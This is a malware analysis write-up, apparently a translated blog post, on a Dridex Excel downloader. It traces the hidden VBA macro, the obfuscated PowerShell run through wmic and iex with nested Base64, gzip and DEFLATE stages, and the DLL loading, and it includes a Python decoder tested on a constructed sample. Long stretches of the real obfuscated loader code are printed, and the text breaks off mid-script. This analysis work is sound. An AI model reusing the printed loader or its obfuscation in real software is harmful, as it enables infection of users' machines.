Dridex Sample Analysis

Dridex Analysis Report

Basic Information

Sample name: INV_984748.xls
Sample type: Excel
Malware type: worm / remote-control trojan
SHA256: 7F8F24884E26B4B508D5147F8F54269E452D1200904323544EF36E30400190B1
Sample name: t9ak0.dll
SHA256: 076547c290c80627993690a9e6c15eeb2ac9b86a9a33af2d3dbaab135f1f43ab

Main Execution Flow

Excel opens the document and runs the macro, which downloads a DLL with a randomly generated file name. regsvr32.exe starts the DLL; the DLL fills its .data section, decrypts it, and the .data section runs to produce shellcode. The shellcode rewrites the PE in memory, after which DllRegisterServer appears in the PE export table and is loaded and executed.

The main functionality is hidden inside that function: collecting information and sending data over the network. The IPs were down, however, and never responded.

Overview of Key Techniques

Macro hiding

The Office macro is hidden with the technique described at https://ratexcel.wordpress.com/2017/03/22/how-to-really-protect-your-code-making-vba-project-unviewable/

Heavy PowerShell obfuscation

The PowerShell command is generated from encrypted characters stored in worksheet cells.

The PowerShell itself is then obfuscated mainly with format strings, Base64 and DeflateStream compression.

Exception-triggered control flow

A vectored exception handler (VEH) is registered and an int3 exception is raised to enter it; the VEH is used mainly to alter the program's execution flow.

Huorong Sword (火绒剑) Analysis

Network behavior

[Figure 1]

There are four connection IPs, but no follow-up activity; the IPs are presumably down.

Registry activity

[Figure 2]

Enumerates and reads registry values

Detailed Analysis

Downloader

Opening the VBA editor shows that the macro project is not viewable.

[Figure 3]

I tried EvilClippy to strip the hidden attribute.

After enabling the macro Excel crashes and the VBA code cannot be viewed, but olevba can dump the VBA code, which also shows that the function calculation_Layout is of AutoExec type.

' Renamed from calculation_Layout so that the AutoExec entry point no longer fires on its own
Private Sub calculation_Lbyout(ByVal Index As Long)
    Debug.Print business(988377)
End Sub

Function business(l As Long)
    Dim als As Range, pay As Range, price As String
    ' Rebuild the command from the constant cells in C192:HA310:
    ' every cell value plus one is taken as a character code
    Set als = Range("C192:HA310").SpecialCells(xlConstants)
    For Each pay In als
        price = price + Chr(pay + 1)
    Next
    ' Run the rebuilt command through WScript.Shell with a hidden window (style 0), then close the workbook
    On Error Resume Next: WScript.Quit = ("" & CreateObject((("WScript.Shell"))).Run((price), (0), (0))): WScript.Quit: MsgBox "": ActiveWorkbook.Close False
End Function

To debug it, though, you still have to open the code window.

The macro code can be roughly understood as being stored compressed in a certain format, so many repeated strings appear only once.

So I searched for the characters of the function, which took a long time; this part looks like compressed code. Changing the function name from Layout to Lbyout stops it from running automatically.

[Figure 4]

At this point I created another macro, rewrote the code into it, and debugged that macro. The macro hides code in the worksheet cells, decrypts it and executes it as VBS.

[Figure 5]

wMIC   "PrOCess"   CALL    CreaTe "pOWershELl  -nOnIntERACTI  -EXEcut  bypaSS  -WIn  000000000000000001   $J0P  =([CHar]34).ToStrINg()  ;SV  0L4 (([ChAr]44).ToStriNG()  ) ;"\"  `${0`Ai}= [type](${J0P}{1}{0}${J0P}-f 'Ert'${0L4}'CoNv')  ; &(${J0P}{2}{1}{0}${J0P} -f'TeM'${0L4}'t-i'${0L4}'se') vArIABlE:H25341  ([TyPE](${J0P}{2}{3}{1}{6}{0}{5}{4}${J0P}-F'Ion.ComPresSIoNM'${0L4}'eS'${0L4}'iO.CoMP'${0L4}'R'${0L4}'E'${0L4}'oD'${0L4}'s') );&(${J0P}{0}{1}${J0P} -f 'n'${0L4}'al') ('Jf') (${J0P}{1}{0}{2}${J0P}-f 'je'${0L4}'New-Ob'${0L4}'ct') -F;.(${J0P}{0}{1}${J0P} -f 'n'${0L4}'al') ('fJ') (${J0P}{0}{1}${J0P} -f'i'${0L4}'ex') -F;`${g`Tr}=(${J0P}{48}{28}{42}{68}{80}{6}{77}{14}{23}{52}{54}{50}{76}{41}{21}{37}{15}{63}{73}{66}{8}{27}{75}{26}{51}{58}{56}{49}{45}{79}{25}{62}{64}{30}{70}{46}{34}{32}{40}{13}{17}{65}{18}{74}{7}{47}{84}{69}{4}{38}{61}{29}{10}{67}{59}{78}{85}{57}{0}{9}{72}{33}{43}{11}{39}{60}{20}{24}{36}{44}{1}{71}{83}{22}{55}{31}{35}{2}{53}{3}{82}{19}{5}{12}{81}{16}${J0P}-f'jmhyqE/UTLonXmw5'${0L4}'z62N9OElOPwzsT3T+Hxi73gksdv2LephraEUZCVHD+0Y4Rgbo8yYx6rOSTpUcE8d8LAT+CFvf+CThVZ9u'${0L4}'wA1'${0L4}'bZ96P56qfr9tsQPg1s9maZVIo+L4'${0L4}'I2ubB1XeI+7huY6DP'${0L4}'KM5clU82ovKYCk2hJighN5vYH5L5zcyUisVzdwQ2vZLMLc9NHL4Sl/qSxaI42E+1tN4c7pnyS+OvMGg6VWFt/t1+Ky2FnmTT0bLCrFilFk34/w+'${0L4}'BVw30NEsFMBFw'${0L4}'lwlhVx3C0'${0L4}'LJxen/Mj1zt3wHe4W2zB'${0L4}'WeItU7enz+99'${0L4}'0kPKIRIE'${0L4}'kL8WoApEK5L7aWvIqfIFBxvqQI0kdkMh5+k5wE3sV0jdZeCmkg85aWO8zDjxPv1nHZePU6r0HvV1tcLorZP80Jy8GSd'${0L4}'MTZz8Or+VsIeTizlrODrCfnvkBkfSrQBDHfjfGISWL6zS+47rz9tcRR0cd6y7gLUnD1LDDc13ljkQEBauBF0UM2SQJ+nMJ3xabfHcDW+DmewzLuvz1r3yLyargRhGwUaHfUoE1XPBmL'${0L4}'96Z1yJW+jg3Gi'${0L4}'g6EToZOhQDQQfAM4GagJ6Ed'${0L4}'x4lRMdk+AtFnN'${0L4}'/bbPr3or7///j/Asl6Z5BAAAA=='${0L4}'aH'${0L4}'xhC1FTnb01Fg3e7fopDk4l+Ly7CbS7GtZ8eiLxqpDSk/ZS1OjydsHwLmwYTh+ezZL1z0bqSTfHX27kK2zp/6Svlw8RJ8lwQhU82d5TWa/YWTJ08pnVbcD5RXKSv6kq9EtGpCCfT5SomVau4l69mYXHbrf6O0mGw/Jq92nS6Cd4M7k6JPEs/5dMx8/'${0L4}'WWgZMo5kqK5PgX4OsQ4fQlu5ZEiC1IHRAjHSZ5ErJgW9ZzXMFdSCr
FAZu9ZTvO2vk8ZmeDLlce3GT+my4fkgxEVwTI5O7EoURifkA1PXydubGh1Gq+MNnllY70NXSPUReF7v3GxHhB5t611kVDjLj72KVagyxeB9ZXm4F57f9wDRjuvj'${0L4}'CxYXcSUm/X02n'${0L4}'1BHHZPC73fExzOep'${0L4}'fMRPyG1TQek7OH9jnLc'${0L4}'0JPQe'${0L4}'8j789kq++2MsSoMywBIWgXv5fzEFZHVfB2afRJew3Gt5H32RjHl4LV5ryhMeB7Rq8Lk2nva3NpqywbdgorKhlnZFPT7PWnN98PCVWLNe6C6d8dlapuhFex3wxRlLwbvusR2HQ+qHK5NEVXDU7XkoaWTld3y+LaROfHBhldYtZyKHaX5mXdSGBImUV43gKhfPcFEgxwOUwG64/x6+pf34ByWxO3sFT/MaLrtZ3vR1VK7dGAd8'${0L4}'726z/fIZ3q1rX2gNhq05ayqO7pnQ0eKFXgPtLj3asrCo8e6au0nxQueUWzKglHgVrxB1Gw/XPdC3'${0L4}'m23BUKOrJR4gVU9Il9celouLv+XMxePTVr7oJWxV3H8vP3JwQ2OYke1cy8HbVMlSptrhb32rgXEBKbjjsEXX'${0L4}'0IlJ5BW03r4j6UVTi45ZtStoRaG418uQYzPkeFJtVmTN7dNwk1JRV09hn0F71MwoC7vlIfL8gZWyv'${0L4}'ekF3MU'${0L4}'X8ZnH00c2LWrKo7IenTO5zt0jtTtWzviuuIHfuHhnsWY2Ue7lXtUZ3wD7JHFv+55R2SB8f'${0L4}'mqo9T0nPyql65SneiWj3vwynYzES3TNWxSdv/Gbjp+RXW+2j2vd04F3W02l/eYPqhBa1chOv/ZuS/3i0DrRrbjRD0w2T7mzYZ7Wu/DelQ6VQ2dhFamtKd27vWPDVXhXJB0s0RoUoUQQmT/fAhoSu0e1Cx0+'${0L4}'xWWuTe5A62w5Xt4FOOiFFOxiFb9PFs0M9BO1TS7ZWD22iUus5E+PjI2JrFrShBPOYBR0z144hQ6vZCpOj2VZf9SuviZc9ODmXBcVMPLKd3CDA'${0L4}'VSky2/2dgDaa+Cm'${0L4}'y8IZnbpU33aCg0+0q'${0L4}'2pGIO/Bq/X3BWrd/85ZsGiq/MdLoTfhQSgDkhcjD0TAvUqMDjqJyHXMvn2CZE0W3rDfEGNgM'${0L4}'ze2nwzB4800XLBljHrM37ukKDi7gaCl2+IM0oUMEhSkN4GG3usnS2IpZTdX0FQvHqKGYv221HJjPB1/CgMyNbCp3+Rx8CLiDLqrrFZuLBL3LfWkt5Fr64r7mPqtuMLeoUtCN9pQgcTZPlnjPyD/KyIf+afTiAMm9LhicZYrrhUwX9x1PluxRfR8KLtXKSkJz7LRb5b6I2do3cpJrcjy8aze9g378CFhL07Jm+OulSPWiHQNm/x/pBGOMiclq1jtEUQ2/QWPOQk4Szkg8ptxeLXdzF'${0L4}'V2K5N9UlOClia+qIdTX1YB95Wz0RTCmXa08/DbNey'${0L4}'Tzc0qFnZe7+BHYmuuh8gd44GeUQVGGMDN3rGkfTRO/piboS9rO+wI4pXpqRK7pLo'${0L4}'D5vD0WcKJqvMu'${0L4}'EcJYiEnr+1ehXoftF8hDY909xCGxME4b//hUzoQmgU8OHd6F7KN0DSEHXzsXfnUzTe4i'${0L4}'NLeeWf1n3IqwNcYFUuleMKhkljqWTaCpYP8UYZmi7MNlQbYHCNL/5nWJ2QrnhA20m+ltuzQHhsfGl+5thc1RFkIM82Sfj/bCStac4OtPOFsVkDN/PSjg8eUEtDQwRRCI6OHZx1ec9QoJcMkX+'${0L4}'opk+2uf7Luctl3UguyWJoHR7S7ngZE8lTOZNIEWVfP4r7cTFLS/YFgXgEbtsL9F/bIn3'${0L4}'+LWoDBgM1gZvDOZp5nDNx4/95StMOypMzUkZSST
qb/8++/zOuvv//973/9wTHsnz8k988fnP3nD8uDwoDyzx+C+ucPjQMVEBFAxAMzHJhxQEcCHQVqDshxYIMDHfiy0ByaYQSwJ4EA2BEQErRxUBga1BAe1DzAokAhgJyGOBgYDeQ'${0L4}'kHjTeNXpw/mAaHj0SsxtjvAZ4Ws'${0L4}'ZgoAxAInUxDJLBCNalC/7hP45qyliTvycC4YOsd'${0L4}'yJYLjuHJiaPKdSr0TzyxZYAVnQ7r4ChGQo9Srmq5PGEy+'${0L4}'VUFdAat4O9n2+2Mf/K8M+rAQ7qlqy94JTlsuFKLu'${0L4}'PvNvINkcc0P2baUjAOvt0iQYXUEKMCk/fpT7SJVAmdZI/gTYSsASlNaCWy'${0L4}'H4sIAAAAAAAEACVXyRKrOpL9l9q8'${0L4}'2LOM57kkk0+FhgmjlNZNvfB71VP3DnbPkeO'${0L4}'SMM6fyyJefY'${0L4}'t'${0L4}'RhUYv/863/zvx7rrMXeentKe/rG6ZHo0ugdhkhi/PU/f/Xf7UU42zMtTjP/'${0L4}'3fuXlgjHxdjzh0ruI3wABuaKbnNxWTXPnx7I1tTjG91363cx'${0L4}'DvcgivjyNmMx0zHqZB9pqVWuRB9baVnIrmBlG2Mf/yHkXZ'${0L4}'pQWr0tIMMKR3Wg9khHQQ1Bq8I'${0L4}'jwlPNqxD'${0L4}'Hf'${0L4}'xUNtr4BDVe2yfc5fZCbq5oiXkVA6Sa'${0L4}'gz5V9'${0L4}'pKPxvGRT87OH+XBLyVI1Id'${0L4}'gUg3iz9XaDCstWh9coXfO+M2SK3P+UZTGvemZdrbyF5ybJ8+FUX6StU8'${0L4}'1v+QvGX1iomENpMGVMfjrvMMGQ9UrsF2ouf8PkTf4C2xJZe0E/9jpDP3meCmgsFfNP0'${0L4}'rkPiTF'${0L4}'X78o2XqtsWfc2GrHCN4XgLmT6vcXi'${0L4}'ry2MXGV0'${0L4}'F/oeg'${0L4}'I0cnhYL/P7hiGt8fGSSJ6Z5R2vh2vGQv7kaiUfRc5qqGzVvpUrHOH7VmDQQ4V08VjSIHPWDGvcYz7eNzH3'${0L4}'cxINdaAPmoCEWbIOaAYWEfYDLA1wajCXBWBpMSgAbFq4NNOH'${0L4}'h4lxYSTOl'${0L4}'PUcn2SYbtKT98FVd'${0L4}'xHMohsa1RE27LpB/Ji0fzVXywKYlX'${0L4}'n7Ms8pCAIKgca9q9lqf0NNGEQKOqfzQUuDS4zGd'${0L4}'E6tC6163o0jeqWZkox'${0L4}'rs/cE/5a46pi0Ox9Dw+6sNKMOFOVWfiJi/BEJB3Teb/PZ8xW5y8efmJzv66qYS9ivuh9KZmiZ46gt'${0L4}'kOLQK3bKmtqy2h2ATi1evYCcoxGvfTQ1rfE2tsTO1b6q9GIso7qTX3tXgO'${0L4}'12XGvOtf/Di8t+xbrleIFw1mYIJPtrOZWT1FdgIHzo8iasyN74RZvGEf'${0L4}'00DAQlXAmFAn4RTg5qHQGAqD'${0L4}'OlDWpjklAQiaXIT5UITSHPzmEn63l/lYBp+a'${0L4}'A0/m'${0L4}'SQAUmoCASsCBgHwhouAJQs1AJ5BToM6DmABoFVwJ3BqbnoB6gQhPwBVoGSBmIAqQ8FMN1QHQ4'${0L4}'SE+1F1yM34TD2c8vXy/FXqmc31JOVkTh1c3RObP'${0L4}'Lw'${0L4}'1N'${0L4}'oMn6/YNvn0n8Fj3tyeEcyXsQyG0MZtbYE3o45pccB2lTllLY7XMpDBb5LY8+GN4hP'${0L4}'Wt+gT75rk3mO/Bpa6G36tU9wofsQoa/FbpMhk79qovTkcd7coQzebd0ue');function N`z(`${V`z}){.('fJ') (.('Jf') (${J0P}{2}{0}{3}{1}${J0P}-f 
'.St'${0L4}'ader'${0L4}'IO'${0L4}'reamRe')(.('Jf') (${J0P}{4}{6}{3}{2}{0}{1}{5}${J0P} -f 'on.GZipSt'${0L4}'re'${0L4}'ressi'${0L4}'p'${0L4}'I'${0L4}'am'${0L4}'O.Com')((&('Jf') (${J0P}{2}{0}{1}{3}${J0P} -f'.Memory'${0L4}'Stre'${0L4}'IO'${0L4}'am') -A @(${0L4} `${0`AI}::(${J0P}{0}{1}{2}${J0P}-f'FromB'${0L4}'ase64Str'${0L4}'ing').Invoke(`${v`Z})))${0L4} (.(${J0P}{0}{1}${J0P}-f'I'${0L4}'TeM') VARIaBLe:h25341 ).VaLUe::${J0P}DEc`Om`preSS${J0P}))).(${J0P}{0}{1}${J0P}-f'ReadT'${0L4}'oEnd').Invoke()};.('Nz')(`${G`Tr})"\"| &( $SheLLid[1]+$shEllid[13]+'X')"

${0L4} is the comma character and $J0P is the double-quote character. Simplifying those first, and then the PowerShell format strings and backtick escape characters, gives the following.

nal creates an alias (it is the built-in alias for New-Alias).

$J0P  =([CHar]34).ToStrINg()  ;
SV  0L4 (([ChAr]44).ToStriNG()  ) ;
"\"  ${0Ai}= [type]("CoNvErt")  ;
&("set-iTeM") vArIABlE:H25341  ([TyPE]("iO.CoMPReSsIon.ComPresSIoNMoDE") );
&("nal") ('Jf') ("New-Object") -F;
.("nal") ('fJ') ("iex") -F;
${gTr}=("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");
function Nz(${Vz})
{
.('iex') (.('New-Object') ("IO.StreamReader")(.('New-Object') ("IO.Compression.GZipStream")((&('New-Object') ("IO.MemoryStream") -A @(, ${0AI}::("FromBase64String").Invoke(${vZ}))), (.("ITeM") VARIaBLe:h25341 ).VaLUe::"DEcOmpreSS"))).(ReadToEnd).Invoke()
};
.('Nz')(${GTr})"\"| &( $SheLLid[1]+$shEllid[13]+'X')

After decoding, the function Nz is roughly:

iex (.New-Object IO.StreamReader (.New-Object IO.Compression.GZipStream((New-Object IO.MemoryStream -A @(, ${0AI}::FromBase64String.Invoke(${vZ}))), (ITeM VARIaBLe:h25341 ).VaLUe::"DEcOmpreSS"))).(ReadToEnd).Invoke()

VZ is Base64-encoded, and GTR is passed as VZ. GTR is first Base64-decoded; the result is a gzip stream, which is decompressed to obtain:

.('Nz')(("{100}{38}{17}{79}{76}{7}{24}{51}{39}{26}{90}{18}{87}{34}{47}{86}{11}{10}{0}{71}{30}{102}{93}{74}{29}{73}{13}{65}{16}{75}{98}{48}{23}{56}{101}{5}{81}{1}{105}{97}{52}{95}{92}{62}{32}{94}{99}{53}{36}{50}{25}{77}{3}{27}{8}{2}{44}{106}{28}{22}{55}{12}{72}{46}{45}{66}{89}{43}{54}{41}{82}{40}{6}{4}{49}{61}{68}{20}{96}{42}{9}{104}{15}{88}{57}{107}{59}{78}{37}{80}{69}{35}{19}{91}{63}{84}{14}{58}{85}{83}{67}{70}{21}{31}{64}{33}{103}{60}"-f'JtrIYTtCKDvdZ15p2mdXZWW+cM','nbuP2RuKdgyNfboFVXX9hCr0Y6m6HqQxdhIiSD5xuhOO+vG0hlY0aUJAfmXcpr8H9+b9rYLLDkNZLa1gzUZYLOSTVAzj3d','aIv8e3ibA7X1om1cYihfMbX0O92LyB3lwlK7ZhquvBIVeCdcVMmvS8T','94f6eDq','4j91wnQc/','b2LymV','jR7wsHb7y9k4xjY3AwwxYxKYrDfWudon7E8FK','N/sL9g/C8E/8+/G6Me/vjj1/dcLn5q4zc7atPCr049Dr+zXFDpLXc2m6e1P/+RjN8a3492tG5LTmv/+fmHNXQ/X9z//P13sRhaEjv8C1vd','0u0/q2dEt','Sfi2jJgiBJCeuGdm2/fOkEqRM6yZoGQ7H6yeJm8qAj4Oj50aoIPjKXVV8KJcUUg3E0vi+gxLi7qekjOOlv','ql1iPvi+85+TlJkj5I9Q0sYRzlPidz6OMiF3bQvG','usFG4T','kGYs','5y0b1Dxk8FLKsNnHyIOrmVlH1SROUfZaW','f3/xir6ZRHhdGidkzl1TlYnA+30qxF','utnBoHlzo8+HTJuayvE7qK','i5D+yGx34kTGWxlpnVY8TMK3seqU0VMN114eernVwPjq8yrQU83p+ufARMTEcRHEjdAnK1cQE','XyR7R1/03','04SHOS92N61C1ykviFrFXU6nHljU','Mk/l8OimxmKk5XGOVTJ/gFnHd7','N0mitnqGTVKXYNEAMg1OYu3','evxSSz/ZufP/1PIlGN','Q6hY4a88zNWW7T3ICVIP9q1raYa','h0snALyLF+3KnU6Vj8WA1uILwnsGetztYTMC7iv029UA','RdLFP//I/ObyqUXhDzyEqjt3XnNb6mE+YsXzruXXywpbdpap7tCQU1ImKR','jHdDvCUoHAWOip7qwlFQDnsR5L2mt1Mno6erqfRu0TInSd','hR4f','00i3Itd5nSnRQA','TzXDx72lM42GXR','9yZA/W2vT4ls5WKTRL37keoIcla9ijiiVji','Yuy7lbw7J9whVnWgAFdHQETyyvEEgG2jmlp2YmhquUvs0lSnZ9OENMH9u6DpTq1ohD','P+Eoxk6P3I5V844fL0SzU276y//uenMBY','oihB6uFZc','/cUd50syufb7Sz2Ou+S','DFi6HDMh10dqBNG0nqY00MIvAqQS','O','6kwrZd0Qc4SWJ/kq5bhukxY','0pPLUuMQ84i23oEqQy6Tw0h7QqYXydmQBBcpWZKiAxTEs/OI','AB2Xx87sSHKFX+VfDNB9wZ5L','nUL0oMy0/tPT7sE/t0+7hB8ERLdMtuQvO5ckx8S48feCB57Pst1Xb/YHR3DKETddMkflJ','z0ooxwverDzFep4cfvRLuz+umQqnzDb8YoXasc02/IUrEtcrUk6EDTIhKijlo4TgGt3wDzkLO5OOlQyJd2l6lQkXn7CQgm/vC5uCEMJDTjSKS2/mASr3pU32Kjwzr9YJzar
n2Utj1HGM57FvWx5gOde2ydH6s9q8X1cB3RNRZZyKY7iywYowBkFzzik7z2rz5vsh6gn6xVjOSGdt','CWWTCp9k2fY59peIsg6R1uCXAH','iY/A6fndwBQ2dGWRcvX','9K','v','AlD3g53jZwE','6cUl/yQqR8RDTJ2+CpVr7Mvc5oxrPEYVdkhhDWmvrhAoO3bhxnVoZW1pxh46WqHp4Q3s7jjh1U1UM0BU6ouR95yh','AiyFDKdgrBwSAk00lO5LqSAwZe8u','qKrC54I8Z5E5Tu3nDRQU5yGGDbDirrzMavpN1','ltHBp+txmRabomRDmvulp1LGUVUgT1TO6NeaIChvXje9k','+sUzFfm2eVMbac9+I2q2dkEWxOPNbZ','bkU1h2cKeOTxPJSNYAfK8jGfpB8Ok4etIbiSAxWZCg0E','gDz90ck+rekotYn0U1nkY8wX','GLqa3O0DRh2+DIEkXfAkVDrkJr35FnzhoNMUhQIUg/K9mlcrFxrPlO/CiPmJWJESF','CgLE3WRjPjgyREpFcxWr3FOLEk9ZRBN8/U2j6dvcTYORecTsqmvdKbFvreeXT+V224f0klvjEqdyN/c2/XinJk45vs1E9eEVZv','OhCLM4','qQiVD9NMPjdJRam8qxnGY8uRAapI','3zGMiVB4VEniul3zgUA6+pjxEXDHo+XRKURVCBnHN','3gTdO','mOs7Tapo995Z7RS7YdOnTJ5uzlVySt3','df3z6+d/f/22c5rbjHzg/vz59X/kn6kCWQ0AAA==','YSN','/uy7FMmPGbV+dW/SfpnSryBMZBtBDwQ','uUex8UvDA1lEX3Hpg71B1GY3UvrNK+ZaauiQZRpYHAosoi3IHWTCyaYi2ej9jWNncWzoxzt3FrTpBd8','+Zt//','JXPi0EjTKQ8tlIsuI','/BGu0OeqVnvFclNZJO1H2tfn','FmxzNIuMIg7bu0GGvgoTzzBltpx4hozuGBHMTHIcJIdqOeCfYCu3f2a0oPWil8H0xhNarv3Aoc6cGPC','Lzn26XoEWoqg','prPKUzTJ8R731QePYJNXqCvylz5isjS5VOxYFDXEwqghrBwBPik2HPzkTpBf7Xb+06ltOfWbkkZr2','RV//Pz66+ef','mds1a9aRHNE0kfZq2+9VenRaQTr52Df14','YFagT9sQs1DT9u0bkiolhd','7DRUWQY+26CJhe6JtNocdxiM','q0','VTWnUP/','B77ynp3VXQOpGBQOQ5J+P7/fPnz7/44fibNfp1yt','qx','zoZZXf1S5AOiIdeX1cTyOJ+p','lVjIN','i0eSCEm','Wl9nn','psGgqgsBOjKyl/eM/mHIIQl6V','mcS6u3U1p6Q0D7td22KEVD','Sx92yAmLgE4jdyGsvb4LBarfNTq','YgioPRhSgNVM9OuUNfgyRcIfAQE0OapaF1','YmCHKFUMBr/2gS','4u','oQ0JtmQABhDeFPVVgPn46pglbm4cr+9jYJgMH','AanP3xo9B+GpLSMuO1AvD8bjIcnS/zmmgFpdSlpP','z7g2URkWR0AEEwMp9J3at+UyfamA2MQ4Lf','Y0fGS4g9b1/Rbugb+I1glmS+h5q9efB9ms5u7rXZhBcCxeepymJQCTx1Ac7FRN9NpLDjpIgA5Q9O9UodX1sXzsum6IsABldCVJEcc8O+a/Eli71zbsM1M/tZfNx06EzzJYWRzgwo','nMINTUki6czfxKnMurd0LnIwCyrB7ZJkbLySSnuoWKM0rTrE3GgnfgVWKgIe+pp3WHtKA5KoYLg','liS3W3AxT6IVBXLrB8gqG/FejL','Hg3i/E0ztyBCvPy50r1','hxzvMwGmeoKJ2BsARN85cQiBApRW9VNLL3CZ4pR6IjYuu','WjvomgDjxVTTnRCQRBf','ljvB6HL','w7zgtAieG
M9UGsJSz1fFvV+IxzaRGRrihK7X4fY4WNAj24AfNkYUocrZ6r4H0YrmxVQ5t36CffN1M','S4b3gsGR0wHOInNoFeGwdYbAoIL4i0lfbuwt5DWTDQ5Xsta','H4sIAAAAAAAE','8EPybiAvWqS0RtWpRAvCJfM835lAZ','AfmVWOUAtDZF1LKCriXmE','xtvA0ly9//uu/fv76x+VD9zc/sGNW6+K3Rrym','lgKvMTuR','KYhjyCmPfb0EHVBWXVu5Wnd2ViKs06dhM','HLQ','1r4JRhPPTUtDn6uSTDGy6yL2URy0raQZQyTX'))

This is another similar call; first strip the format-string obfuscation:

.('Nz')(("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"))

Base64-decoding and gzip-decompressing again yields the following data:

. ( $Env:COmspec[4,15,25]-jOin'') (New-Object iO.CoMprEsSion.deFLAteStREAM([IO.MEmoRYstreAM] [CONVerT]::frOMbaSE64sTrING('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' ), [io.CompReSSion.CoMPREsSIONmoDe]::DecoMpRESs)| fOrEaCH{
     Jf SYsteM.iO.STreaMrEADer($_ ,[TEXT.EnCodiNG]::ascii ) }).ReADtOenD( )
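A Python equivalent of the Nz() decode chain, added here and not the author's code: Base64, then GZipStream for the first two stages or raw DEFLATE for this stage's DeflateStream, repeated over nested stages. It assumes the format-string obfuscation has already been removed so each Base64 blob is a single quoted literal, and it builds its own three-layer sample instead of using the real payload.

```python
import base64
import gzip
import re
import zlib

# A quoted Base64 literal of meaningful length. Assumption: the -f format-string
# obfuscation has already been resolved, so each blob is one contiguous literal.
_B64_LITERAL = re.compile(r"""['"]([A-Za-z0-9+/]{40,}={0,2})['"]""")


def inflate_dotnet(raw: bytes) -> bytes:
    """Decompress the way the script's stream objects do.

    GZipStream output starts with the gzip magic 1f 8b; .NET's DeflateStream
    writes raw DEFLATE with no zlib or gzip header, which zlib only accepts
    with wbits = -15.
    """
    if raw[:2] == b"\x1f\x8b":
        return gzip.decompress(raw)
    return zlib.decompress(raw, -15)


def decode_stage(blob: str) -> str:
    """Python equivalent of Nz(): FromBase64String -> decompress -> ReadToEnd."""
    return inflate_dotnet(base64.b64decode(blob)).decode("utf-8")


def peel_stages(stage_text: str) -> list:
    """Decode nested stages until no embedded blob remains.

    Returns every stage outermost first; the last entry is the script that
    would finally have reached iex.
    """
    stages = [stage_text]
    while True:
        found = _B64_LITERAL.search(stages[-1])
        if found is None:
            return stages
        stages.append(decode_stage(found.group(1)))


def _wrap_gzip(text: str) -> str:
    return base64.b64encode(gzip.compress(text.encode("utf-8"))).decode("ascii")


def _wrap_deflate(text: str) -> str:
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)   # raw DEFLATE, as DeflateStream emits
    data = comp.compress(text.encode("utf-8")) + comp.flush()
    return base64.b64encode(data).decode("ascii")


def build_sample() -> str:
    """Constructed three-layer sample shaped like the page's chain (test data only):
    two GZipStream layers wrapping one DeflateStream layer."""
    final = "Write-Output 'constructed final stage: nothing is executed here'"
    stage3 = (". ($Env:COMSPEC[4,15,25]-join '') (New-Object IO.Compression.DeflateStream "
              "([IO.MemoryStream][Convert]::FromBase64String('%s'), "
              "[IO.Compression.CompressionMode]::Decompress))" % _wrap_deflate(final))
    stage2 = ".('Nz')(('%s'))" % _wrap_gzip(stage3)
    return "function Nz(${Vz}){ <decoder as above> }; .('Nz')('%s')" % _wrap_gzip(stage2)


if __name__ == "__main__":
    for depth, text in enumerate(peel_stages(build_sample())):
        print("stage %d: %s" % (depth, text[:60]))
```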

$Env:COmspec[4,15,25]-jOin''

This expression evaluates to iex: characters 4, 15 and 25 of $Env:COMSPEC (C:\WINDOWS\system32\cmd.exe) spell "Iex", so the decompressed text is executed.

After Base64 decoding, the data is decompressed with DeflateStream:

 ${
     ckf`qWa}=[TYPe]("{0}{2}{1}{5}{3}{4}"-f 'r',("{0}{1}"-f 'fL','ec'),'e','I',("{0}{2}{1}" -f'O',("{0}{2}{1}" -f '.a','SEMbLy','S'),'N'),'t')  ;  ${
     FI0E`dw}  =[tYpe]("{3}{4}{6}{5}{1}{0}{2}{7}" -F 'nd','.wI','oWs','SY',("{1}{3}{2}{0}"-f 'Y.p',("{1}{2}{0}"-f'EM.SECu','S','t'),'t','rI'),'L',("{0}{2}{1}"-f ("{1}{0}"-f 'C','RIn'),'PA','i'),("{0}{1}" -f 'iD',("{1}{0}" -f'iTY','ENT'))) ; &("{2}{1}{0}"-f'M','Te',("{1}{0}"-f 'T-I','SE'))  ("v"+("{1}{0}" -f ("{0}{1}"-f'bl','E:'),("{0}{1}"-f'ARi','A'))+("{1}{0}" -f'5k','WA')) ([TyPE]("{0}{1}{2}" -F("{1}{0}"-f 'Xt','te'),("{1}{2}{0}" -f 'odI','.','EnC'),'ng')  );   &("{2}{0}{1}"-f 't-',("{0}{1}{2}"-f 'VA','RIAbl','E'),'Se') ("{0}{1}" -f'b','UM') ([Type]("{0}{1}{2}"-f 'cO','N',("{1}{0}"-f't','VeR')) ) ;   &("{0}{2}{1}" -f ("{0}{1}"-f 'sET','-'),'LE',("{0}{1}"-f'v','ArIaB')) ("{0}{1}"-f ("{0}{1}" -f'UbI','kM'),'p')  ( [TypE]("{0}{1}" -F'I',("{1}{2}{0}"-f'LE','o.f','i'))  );   ${
     Sa6`1Z}= [tYPE]("{0}{1}" -F("{1}{0}" -f 'e','rEg'),'x')  ;${
     NN}=10*10;${
     yL}='';${
     S}=0;${
     G}=1;function m2(${
     iH}){
     $(${
     i`h}.("{2}{1}{0}"-f'ing',("{1}{0}"-f 'r','bst'),'su')."INvO`ke"(${
     g}) -replace('-',${
     YL})) -replace('S',${
     yl});return ${
     _}};${
     Qe}=(.("{0}{2}{1}"-f'Ge',("{1}{0}"-f 's','ces'),("{1}{0}"-f 'ro','t-P')) -Id ${
     p`Id})."MAI`NwINDOwhA`N`Dle";${
     C`A}=[Runtime.InteropServices.HandleRef];${
     XX}=.("{2}{3}{0}{1}"-f 'c','t','New',("{1}{0}"-f'bje','-O')) ${
     cA}(${
     G},${
     q`E});${
     t}=&("{2}{1}{0}" -f ("{0}{1}" -f'j','ect'),'Ob',("{0}{1}" -f'New','-')) ${
     c`A}(2,${
